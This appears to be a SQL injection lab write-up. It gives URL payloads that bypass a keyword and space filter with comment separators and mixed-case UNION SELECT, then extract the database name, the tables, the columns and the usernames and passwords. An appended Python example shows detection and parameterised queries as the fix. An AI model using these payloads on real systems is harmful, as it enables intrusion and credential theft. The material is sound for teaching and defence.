0x01 Identify the injection point
Single-quote string-type injection; the filter strips #, --, spaces and similar characters.
?id=1'%26%26'1'='1
# %26 is &
Closed successfully
0x02 Determine the database name
?id=1234'/*%0a*/UnIoN/*%0a*/SeLeCt/*%0a*/2,database(),4/*%0a*/||/*%0a*/'1'='1
# /*%0a*/ is used to force a separator where spaces are stripped; mixed case in union select bypasses the keyword filter
0x03 Determine the table names
?id=1234'/*%0a*/UnIoN/*%0a*/SeLeCt/*%0a*/2,(SeleCt/*%0a*/group_concat(table_name)/*%0a*/from/*%0a*/information_schema.tables/*%0a*/where/*%0a*/table_schema='security'),4/*%0a*/||/*%0a*/'1'='1
0x04 Determine the column names
?id=1234'/*%0a*/UnIoN/*%0a*/SeLeCt/*%0a*/2,(SeleCt/*%0a*/group_concat(column_name)/*%0a*/from/*%0a*/information_schema.columns/*%0a*/where/*%0a*/table_schema='security'/*%0a*/%26%26/*%0a*/table_name='users'),4/*%0a*/||/*%0a*/'1'='1
0x05 Retrieve the data
?id=1234'/*%0a*/UnIoN/*%0a*/SeLeCt/*%0a*/2,(SeleCt/*%0a*/group_concat(username,password)/*%0a*/from/*%0a*/users),4/*%0a*/||/*%0a*/'1'='1
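As an added example (not code from the original writeup or the lab), the following shows from the defender's side why the blacklist described above fails and what actually fixes it: a reconstructed blacklist modelled on the writeup's description (an assumption, not the lab's real source), a normaliser that decodes the parameter and strips block comments before matching so the comment-as-space and mixed-case tricks no longer hide `union select`, and a parameterised query that treats the whole value as data.

```python
import re
import sqlite3
from urllib.parse import unquote

# Assumed reconstruction of the lab's blacklist: strips '#', '--' and spaces
# but does not touch block comments, which is the gap the writeup exploits.
def naive_blacklist(value: str) -> str:
    return re.sub(r"#|--| ", "", value)

# Defender-side normalisation: URL-decode, replace MySQL block comments with a
# space, collapse whitespace and lower-case, so keyword matching sees the query
# the way the database engine will parse it.
def normalize(value: str) -> str:
    decoded = unquote(value)
    no_comments = re.sub(r"/\*.*?\*/", " ", decoded, flags=re.S)
    return re.sub(r"\s+", " ", no_comments).strip().lower()

UNION_SELECT = re.compile(r"\bunion\b.*\bselect\b")

def looks_like_union_injection(value: str) -> bool:
    return bool(UNION_SELECT.search(normalize(value)))

# Payload copied from section 0x02 of the writeup, exactly as it arrives in ?id=.
PAGE_PAYLOAD = "1234'/*%0a*/UnIoN/*%0a*/SeLeCt/*%0a*/2,database(),4/*%0a*/||/*%0a*/'1'='1"

def blacklist_passes_payload() -> bool:
    # After decoding, the only whitespace is the newline inside each comment and
    # there is no literal space, '#' or '--', so the blacklist removes nothing.
    decoded = unquote(PAGE_PAYLOAD)
    return naive_blacklist(decoded) == decoded

# The real fix: bind the value as a parameter; no quoting or comment trick can
# change the statement's structure. Constructed in-memory table for the demo.
def lookup_with_parameters(raw_id: str) -> list:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES (1, 'alice', 'secret')")
    rows = conn.execute("SELECT username FROM users WHERE id = ?", (raw_id,)).fetchall()
    conn.close()
    return [r[0] for r in rows]

if __name__ == "__main__":
    print("blacklist passes payload:", blacklist_passes_payload())
    print("normalised:", normalize(PAGE_PAYLOAD))
    print("flagged:", looks_like_union_injection(PAGE_PAYLOAD))
    print("parameterised lookup:", lookup_with_parameters(PAGE_PAYLOAD))
```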